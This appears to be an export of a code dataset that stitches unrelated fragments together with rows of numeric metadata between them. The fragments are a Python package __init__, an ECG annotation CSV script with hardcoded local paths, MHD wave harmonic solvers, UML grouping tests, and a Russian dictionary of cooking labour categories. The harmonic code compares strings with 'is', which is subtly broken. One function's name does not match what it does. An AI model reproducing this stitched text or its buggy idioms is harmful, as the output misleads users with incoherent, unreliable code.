| 0.004981
| 0.345634
| 25,770
| 703
| 112
| 36.657184
| 0.873036
| 0.614241
| 0
| 0.817778
| 0
| 0
| 0.113099
| 0.047253
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.013333
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0eb950996b8e6445e656f2185f0d886d27c5571c
| 218
|
py
|
Python
|
relevanceai/operations/dr/models/__init__.py
|
RelevanceAI/RelevanceAI
|
a0542f35153d9c842f3d2cd0955d6b07f6dfc07b
|
[
"Apache-2.0"
] | 21
|
2021-11-23T13:01:36.000Z
|
2022-03-23T03:45:30.000Z
|
relevanceai/operations/dr/models/__init__.py
|
RelevanceAI/RelevanceAI
|
a0542f35153d9c842f3d2cd0955d6b07f6dfc07b
|
[
"Apache-2.0"
] | 217
|
2021-11-23T00:11:01.000Z
|
2022-03-30T08:11:49.000Z
|
relevanceai/operations/dr/models/__init__.py
|
RelevanceAI/RelevanceAI
|
a0542f35153d9c842f3d2cd0955d6b07f6dfc07b
|
[
"Apache-2.0"
] | 4
|
2022-01-04T01:48:30.000Z
|
2022-02-11T03:19:32.000Z
|
from relevanceai.operations.dr.models.ivis import Ivis
from relevanceai.operations.dr.models.pca import PCA
from relevanceai.operations.dr.models.umap import UMAP
from relevanceai.operations.dr.models.tsne import TSNE
| 43.6
| 54
| 0.853211
| 32
| 218
| 5.8125
| 0.3125
| 0.322581
| 0.537634
| 0.580645
| 0.709677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073395
| 218
| 4
| 55
| 54.5
| 0.920792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ed834a8c86eed138c82c12ba24e2b483a967369
| 5,783
|
py
|
Python
|
others/create_empty_annotations_file.py
|
cph-cachet/cachet-ecg-db
|
655795c23205b8b2563def45667e7daf2b56a570
|
[
"MIT"
] | null | null | null |
others/create_empty_annotations_file.py
|
cph-cachet/cachet-ecg-db
|
655795c23205b8b2563def45667e7daf2b56a570
|
[
"MIT"
] | null | null | null |
others/create_empty_annotations_file.py
|
cph-cachet/cachet-ecg-db
|
655795c23205b8b2563def45667e7daf2b56a570
|
[
"MIT"
] | null | null | null |
import csv
import shutil
import os
import pandas as pd
def rename_results_xlms_to_context(src):
listOfSubjects = os.listdir(src)
print(listOfSubjects)
# listOfDir= listOfDir.remove(".DS_Store")
if '.DS_Store' in listOfSubjects:
listOfSubjects.remove('.DS_Store')
print(listOfSubjects)
count_no=0
count_yes=0
for subject in listOfSubjects:
days = 0
print("processing subject" + subject)
listOfrecordings = os.listdir(src + "/" + subject)
# if not os.path.exists(screening_images_path+ "/" +subject+"/"):
# os.makedirs(screening_images_path+ "/" +subject)
# if os.path.exists(screening_images_path+ "/" +subject+"/"+subject+ ".csv"):
# os.remove(screening_images_path+ "/" +subject+"/"+subject+ ".csv")
# print("Deleted old file")
# else:
# print('File does not exists')
# with open(screening_images_path+ "/" +subject+"/"+subject+ ".csv", 'a') as f:
if '.DS_Store' in listOfrecordings:
listOfrecordings.remove('.DS_Store')
print(listOfrecordings)
listOfrecordings[:] = [x for x in listOfrecordings if ".json" not in x]
for listOfrecording in listOfrecordings:
print("processing recording " + listOfrecording + " of " + subject)
records = os.listdir(src + "/" + subject + "/" + listOfrecording)
print(listOfrecordings)
if '.DS_Store' in records:
records.remove('.DS_Store')
print(records)
# print(length)
for path in records:
if '.DS_Store' in records:
records.remove('.DS_Store')
# print(records)
# print("createing hrv of record"+ path+" of" + listOfrecording + " of " + subject)
file_src = src + "/" + subject + "/" + listOfrecording + "/" + path
#print(src + "/" + subject + "/" + listOfrecording + "/" + path + "/images")
if (os.path.getsize(file_src + "/annotation.csv") != 0):
print("file exists ")
# os.rename(file_src+"/Results.xlsx", file_src+"/context.xlsx")
with open(file_src + "/annotation.csv", newline='') as f:
r = csv.reader(f)
data = [line for line in r]
with open(file_src + "/annotation.csv", 'w', newline='') as f:
w = csv.writer(f)
w.writerow(['Start', 'End', 'Class'])
w.writerows(data)
else:
print('File does not exists')
count_no+=1
print(days)
print("no " + str(count_no))
print("Yes" + str(count_yes))
def create_empty_csv_file_if_no_annotaions_exists(src):
listOfSubjects = os.listdir(src)
print(listOfSubjects)
# listOfDir= listOfDir.remove(".DS_Store")
if '.DS_Store' in listOfSubjects:
listOfSubjects.remove('.DS_Store')
print(listOfSubjects)
count_no=0
count_yes=0
for subject in listOfSubjects:
days = 0
print("processing subject" + subject)
listOfrecordings = os.listdir(src + "/" + subject)
# if not os.path.exists(screening_images_path+ "/" +subject+"/"):
# os.makedirs(screening_images_path+ "/" +subject)
# if os.path.exists(screening_images_path+ "/" +subject+"/"+subject+ ".csv"):
# os.remove(screening_images_path+ "/" +subject+"/"+subject+ ".csv")
# print("Deleted old file")
# else:
# print('File does not exists')
# with open(screening_images_path+ "/" +subject+"/"+subject+ ".csv", 'a') as f:
if '.DS_Store' in listOfrecordings:
listOfrecordings.remove('.DS_Store')
print(listOfrecordings)
for listOfrecording in listOfrecordings:
print("processing recording " + listOfrecording + " of " + subject)
records = os.listdir(src + "/" + subject + "/" + listOfrecording)
print(listOfrecordings)
if '.DS_Store' in records:
records.remove('.DS_Store')
print(records)
# print(length)
for path in records:
if '.DS_Store' in records:
records.remove('.DS_Store')
# print(records)
# print("createing hrv of record"+ path+" of" + listOfrecording + " of " + subject)
file_src = src + "/" + subject + "/" + listOfrecording + "/" + path+"/annotation.csv"
#print(src + "/" + subject + "/" + listOfrecording + "/" + path + "/images")
if os.path.exists(file_src):
print("file exists ")
days+=1
count_yes+=1
else:
count_no += 1
print('File does not exists')
#pd.DataFrame({}).to_csv("annotation.csv")
# with open(file_src, 'w') as emptyfile:
# passi
print(days)
print("no " + str(count_no))
print("Yes" + str(count_yes))
rename_results_xlms_to_context("/Users/deku/Desktop/CACHET-AFDB/FINAL/annotations")
#create_empty_csv_file_if_no_annotaions_exists( "/Users/deku/Desktop/CACHET-AFDB/FINAL/annotations")
| 35.919255
| 105
| 0.508905
| 552
| 5,783
| 5.184783
| 0.157609
| 0.044025
| 0.045423
| 0.090846
| 0.852551
| 0.826695
| 0.798043
| 0.768693
| 0.742138
| 0.708595
| 0
| 0.002999
| 0.365727
| 5,783
| 161
| 106
| 35.919255
| 0.777263
| 0.265433
| 0
| 0.746988
| 0
| 0
| 0.106237
| 0.01162
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024096
| false
| 0
| 0.048193
| 0
| 0.072289
| 0.289157
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0eeea505140d78c662e659ecfe3cfdf9ed0e6c3d
| 5,169
|
py
|
Python
|
MHDWaveHarmonics/FindHarmonics.py
|
mattkjames7/MHDWaveHarmonics
|
ac8fcc5bf9190d300774c4e114a6ec4be865f014
|
[
"MIT"
] | 1
|
2022-03-11T13:47:00.000Z
|
2022-03-11T13:47:00.000Z
|
MHDWaveHarmonics/FindHarmonics.py
|
mattkjames7/MHDWaveHarmonics
|
ac8fcc5bf9190d300774c4e114a6ec4be865f014
|
[
"MIT"
] | null | null | null |
MHDWaveHarmonics/FindHarmonics.py
|
mattkjames7/MHDWaveHarmonics
|
ac8fcc5bf9190d300774c4e114a6ec4be865f014
|
[
"MIT"
] | null | null | null |
import numpy as np
import ctypes
from numpy.ctypeslib import ndpointer
from . import Globals
def FindHarmonics(T,s,Params,halpha=None,RhoBG=None,Harmonics=[1,2,3],x0=None,df=1.0,Method='Complex'):
'''
Finds harmonic frequencies of waves capable of standing on a given field line.
Args:
T: TraceField object.
s: Array storing distance along field line in km.
halpha: h_alpha array for field line in order to use Singer et al. wave equation, or None for simple wave equation.
Params: For power law: 2-element array/list [p_eq,power].
For Sandhu model: 5-element array/list [n0,alpha,a,beta,mav0] (see GetSandhuParams).
Harmonics: A list or array of the harmonic numbers to be found.
x0: starting frequency.
df: Frequency step size in mHz (default=1.0), smaller values should be used when expecting very low frequencies
this parameter is not used if Method='Complex', but is used for Method='Simple'.
Method: Set to 'Complex' or 'Simple' to use either complex or simple shooting method.
Returns:
ndarray containing a list of nh harmonic frequncies in mHz.
boolean array to say if fit was succesful (only really applicable for Complex method)
number of iterations used to calculate harmonics.
'''
_B = np.sqrt(T.Bx**2.0 + T.By**2.0 + T.Bz**2.0).astype('float32')
_R = np.sqrt(T.x**2.0 + T.y**2.0 + T.z**2.0).astype('float32')
_maxR = np.float32(np.nanmax(_R))
_s = s.astype('float32')
if not halpha is None:
_halpha = halpha.astype('float32')
else:
_halpha = np.ones(np.size(s),dtype='float32')
if not RhoBG is None:
_RhoBG = RhoBG.astype('float32')
else:
_RhoBG = np.zeros(np.size(s),dtype='float32')
_n = T.nstep
_Params = np.float32(Params)
_nP = np.int32(np.size(Params))
_HarmInds = np.array(Harmonics,dtype='int32')
_nh = np.int32(_HarmInds.size)
_freqs = np.zeros(_nh,dtype='float32')
if x0 is None:
if Method is 'Complex':
x0 = np.float32(1.0)
else:
x0 = np.float32(0.0)
if Method is 'Complex':
if np.size(x0) == 1:
_x0 = np.zeros(_nh,dtype='float32')+x0
else:
_x0 = np.array(x0,dtype='float32')
_nIter = np.zeros(_nh,dtype='int32')
else:
_x0 = np.float32(x0)
_nIter = np.zeros(1,dtype='int32')
_df = np.float32(df)
_Success = np.zeros(_nh,dtype='bool8').astype('bool8')
if hasattr(T,'InPlanet'):
_InPlanet = np.float32(T.InPlanet)
elif hasattr(T,'Rmso'):
_InPlanet = np.float32(T.Rmso < 1.0)
else:
_InPlanet = np.float32(T.R < 1.0)
if Method is 'Complex':
Globals._CppFindHarmonicsComplex(_B,_R,_s,_halpha,_InPlanet,_RhoBG,_n,_Params,_nP,_maxR,_HarmInds,_nh,_x0,_Success,_nIter,_freqs)
else:
Globals._CppFindHarmonics(_B,_R,_s,_halpha,_InPlanet,_RhoBG,_n,_Params,_nP,_maxR,_df,_HarmInds,_nh,_x0,_nIter,_freqs)
return _freqs,_Success,_nIter
def FindHarmonicsPMD(B,pmd,s,halpha=None,RhoBG=None,Harmonics=[1,2,3],x0=None,df=1.0,Method='Complex'):
'''
Finds harmonic frequencies of waves capable of standing on a given field line.
Args:
T: TraceField object.
s: Array storing distance along field line in km.
halpha: h_alpha array for field line in order to use Singer et al. wave equation, or None for simple wave equation.
Params: For power law: 2-element array/list [p_eq,power].
For Sandhu model: 5-element array/list [n0,alpha,a,beta,mav0] (see GetSandhuParams).
Harmonics: A list or array of the harmonic numbers to be found.
x0: starting frequency.
df: Frequency step size in mHz (default=1.0), smaller values should be used when expecting very low frequencies
this parameter is not used if Method='Complex', but is used for Method='Simple'.
Method: Set to 'Complex' or 'Simple' to use either complex or simple shooting method.
Returns:
ndarray containing a list of nh harmonic frequncies in mHz.
boolean array to say if fit was succesful (only really applicable for Complex method)
number of iterations used to calculate harmonics.
'''
_B = np.array(B).astype('float32')
_pmd = np.array(pmd).astype('float32')
_s = s.astype('float32')
if not halpha is None:
_halpha = halpha.astype('float32')
else:
_halpha = np.ones(np.size(s),dtype='float32')
if not RhoBG is None:
_RhoBG = RhoBG.astype('float32')
else:
_RhoBG = np.zeros(np.size(s),dtype='float32')
_n = _B.size
_HarmInds = np.array(Harmonics,dtype='int32')
_nh = np.int32(_HarmInds.size)
_freqs = np.zeros(_nh,dtype='float32')
if x0 is None:
if Method is 'Complex':
x0 = np.float32(1.0)
else:
x0 = np.float32(0.0)
if Method is 'Complex':
if np.size(x0) == 1:
_x0 = np.zeros(_nh,dtype='float32')+x0
else:
_x0 = np.array(x0,dtype='float32')
_nIter = np.zeros(_nh,dtype='int32')
else:
_x0 = np.float32(x0)
_nIter = np.zeros(1,dtype='int32')
_df = np.float32(df)
_Success = np.zeros(_nh,dtype='bool8').astype('bool8')
_InPlanet = np.zeros(_n,dtype='float32')
if Method is 'Complex':
Globals._CppFindHarmonicsPMDComplex(_B,_s,_halpha,_pmd,_InPlanet,_RhoBG,_n,_HarmInds,_nh,_x0,_Success,_nIter,_freqs)
else:
Globals._CppFindHarmonicsPMD(_B,_s,_halpha,_pmd,_InPlanet,_RhoBG,_n,_df,_HarmInds,_nh,_x0,_nIter,_freqs)
return _freqs,_Success,_nIter
| 31.907407
| 131
| 0.708454
| 830
| 5,169
| 4.257831
| 0.184337
| 0.033107
| 0.020374
| 0.031692
| 0.850311
| 0.836446
| 0.836446
| 0.822298
| 0.79966
| 0.79966
| 0
| 0.038745
| 0.161153
| 5,169
| 161
| 132
| 32.10559
| 0.776292
| 0.435481
| 0
| 0.715909
| 0
| 0
| 0.085539
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0
| 0.045455
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16521c177783853b349cc8bcc9c4d5403eacfd75
| 2,428
|
py
|
Python
|
gaphor/UML/deployments/tests/test_grouping.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | null | null | null |
gaphor/UML/deployments/tests/test_grouping.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | null | null | null |
gaphor/UML/deployments/tests/test_grouping.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | null | null | null |
from gaphor import UML
from gaphor.diagram.group import group, ungroup
def test_node_group(element_factory):
"""Test node within another node composition."""
n1 = element_factory.create(UML.Node)
n2 = element_factory.create(UML.Node)
assert group(n1, n2)
assert n2 in n1.nestedNode
assert n1 not in n2.nestedNode
def test_node_ungroup(element_factory):
"""Test decomposition of component from node."""
n1 = element_factory.create(UML.Node)
n2 = element_factory.create(UML.Node)
assert group(n1, n2)
assert ungroup(n1, n2)
assert n2 not in n1.nestedNode
assert n1 not in n2.nestedNode
def test_node_ungroup_wrong_parent(element_factory):
"""Test decomposition of component from node."""
n1 = element_factory.create(UML.Node)
n2 = element_factory.create(UML.Node)
wrong = element_factory.create(UML.Node)
assert group(n1, n2)
assert not ungroup(wrong, n2)
assert n2 in n1.nestedNode
assert n1 not in n2.nestedNode
def test_artifact_group(element_factory):
"""Test artifact within node deployment."""
n = element_factory.create(UML.Node)
a = element_factory.create(UML.Artifact)
assert group(n, a)
assert n.deployment
assert n.deployment[0].deployedArtifact[0] is a
assert len(element_factory.lselect(UML.Deployment)) == 1
def test_artifact_group_is_idempotent(element_factory):
"""Test artifact within node deployment."""
n = element_factory.create(UML.Node)
a = element_factory.create(UML.Artifact)
assert group(n, a)
assert group(n, a)
assert group(n, a)
assert n.deployment
assert n.deployment[0].deployedArtifact[0] is a
assert len(element_factory.lselect(UML.Deployment)) == 1
def test_artifact_ungroup(element_factory):
"""Test removal of artifact from node."""
n = element_factory.create(UML.Node)
a = element_factory.create(UML.Artifact)
assert group(n, a)
assert ungroup(n, a)
assert not n.deployment
assert not element_factory.lselect(UML.Deployment)
def test_artifact_ungroup_wrong_parent(element_factory):
"""Test removal of artifact from node."""
n = element_factory.create(UML.Node)
a = element_factory.create(UML.Artifact)
wrong = element_factory.create(UML.Node)
assert group(n, a)
assert not ungroup(wrong, a)
assert n.deployment
assert element_factory.lselect(UML.Deployment)
| 26.977778
| 60
| 0.718287
| 341
| 2,428
| 4.97654
| 0.11437
| 0.222746
| 0.188568
| 0.216853
| 0.842664
| 0.783736
| 0.766647
| 0.766647
| 0.738362
| 0.734237
| 0
| 0.01665
| 0.18369
| 2,428
| 89
| 61
| 27.280899
| 0.839556
| 0.113674
| 0
| 0.685185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.537037
| 1
| 0.12963
| false
| 0
| 0.037037
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
167fe20106988ac8489c218e03601c32dbfe281d
| 27,447
|
py
|
Python
|
scripts/dict/amber_model_workers_food.py
|
Shadybloom/amber-in-the-dark
|
688a6c6fe1a251860174d14a0ca76b5b1c5a5527
|
[
"WTFPL"
] | null | null | null |
scripts/dict/amber_model_workers_food.py
|
Shadybloom/amber-in-the-dark
|
688a6c6fe1a251860174d14a0ca76b5b1c5a5527
|
[
"WTFPL"
] | 3
|
2018-06-25T21:10:44.000Z
|
2019-07-03T13:51:09.000Z
|
scripts/dict/amber_model_workers_food.py
|
Shadybloom/amber-in-the-dark
|
688a6c6fe1a251860174d14a0ca76b5b1c5a5527
|
[
"WTFPL"
] | 2
|
2018-06-24T23:00:17.000Z
|
2019-06-29T10:42:16.000Z
|
#----
# Заметки:
# Группировка по кулинарным приёмам.
# Сортировка, чистка, жарение, варка и так далее.
#----
# Потребление пищи и питья
metadict_model['_-Потребление антреме (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление второго блюда (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление выпечки (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление десерта (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление жареной выпечки (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление орешков (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление первого блюда (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление сладостей (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление вареников (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление соуса (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление сэндвичей (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление фруктов (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление хлеба (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление холодного питья (нормо-часов)'] = {
'_--Потребление питья (нормо-часов)':1,
}
metadict_model['_-Потребление горячего питья (нормо-часов)'] = {
'_--Потребление питья (нормо-часов)':1,
}
#----
# Процессы (кипячение):
metadict_model['_-Кипячение консервов (нормо-часов)'] = {
'_--Кипячение (нормо-часов)':1,
}
metadict_model['_-Кипячение воды (нормо-часов)'] = {
'_--Кипячение (нормо-часов)':1,
}
#----
# Процессы (варка, уваривание):
metadict_model['_-Варка напитка (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка бобов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка грибов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка овощей (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка орехов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка супа (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка лапши (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка вареников (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка пудинга (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка рисовых лепёшек (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка каши (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка риса (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка пшена (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка корнеплодов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка компота (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Бланширование овощей (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Бланширование фруктов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Бланширование семян (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Заваривание чая (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Заваривание кофе (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
#----
# Процессы (варка, уваривание):
metadict_model['_-Варка напитка заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка бульона заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка соуса заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка фруктов заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка сиропа заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка яблочного джема (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка варенья (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка семян (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание сиропа (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание сока кленового (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание сока виноградного (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание томатов (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание фруктов (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание бульона (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Бланширование лапши (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Бланширование орехов (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Заваривание муки (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
#----
# Процессы (тушение):
metadict_model['_-Тушение грибов (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
metadict_model['_-Тушение бобов (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
metadict_model['_-Тушение овощей (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
metadict_model['_-Тушение фруктов (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
#----
# Процессы (томление):
metadict_model['_-Томление овощей (нормо-часов)'] = {
'_--Томление пищи (нормо-часов)':1,
}
metadict_model['_-Томление пудинга (нормо-часов)'] = {
'_--Томление пищи (нормо-часов)':1,
}
metadict_model['_-Томление каши (нормо-часов)'] = {
'_--Томление пищи (нормо-часов)':1,
}
#----
# Процессы (запекание):
metadict_model['_-Запекание овощей (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
metadict_model['_-Запекание корнеплодов (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
metadict_model['_-Запекание фруктов (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
metadict_model['_-Запекание орехов (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
#----
# Процессы (выпечка):
metadict_model['_-Выпечка хлеба (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_model['_-Выпечка пудинга (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_model['_-Выпечка пряников (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_model['_-Выпечка печенья (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка блинов (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка булочек (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка кексов (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка лепёшек (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка пирога (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка пирожков (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка суфле (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
#----
# Процессы (прокаливание, выпечка заранее):
metadict_model['_-Прокаливание крупы (нормо-часов)'] = {
'_--Прокаливание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Прокаливание муки (нормо-часов)'] = {
'_--Прокаливание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (жарение):
metadict_model['_-Жарение темпе (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение блинов (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение оладий (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение пончиков (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_detail['_-Жарение выпечки (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение грибов (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение овощей (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение фруктов (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Обжаривание хлеба (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
#----
# Процессы (жарение заранее):
metadict_model['_-Обжаривание бобов (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Обжаривание орехов (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Обжаривание семян (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Обжаривание кофейных зёрен (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
#----
# Процессы (протирание, выдавливание):
metadict_detail['_-Протирание бобов (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Протирание зелени (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Протирание овощей (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Протирание фруктов (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Выдавливание чеснока (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
#----
# Процессы (протирание, выдавливание заранее):
metadict_detail['_-Процеживание бульона (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание томатов заранее (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание семян (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание орехов (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание крупы (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (отжим):
metadict_model['_-Отжим овощей (нормо-часов)'] = {
'_--Отжим пищи заранее (нормо-часов)':1,
}
metadict_model['_-Отжим фруктов (нормо-часов)'] = {
'_--Отжим пищи заранее (нормо-часов)':1,
}
metadict_model['_-Отжим соевого сусла (нормо-часов)'] = {
'_--Отжим пищи заранее (нормо-часов)':1,
}
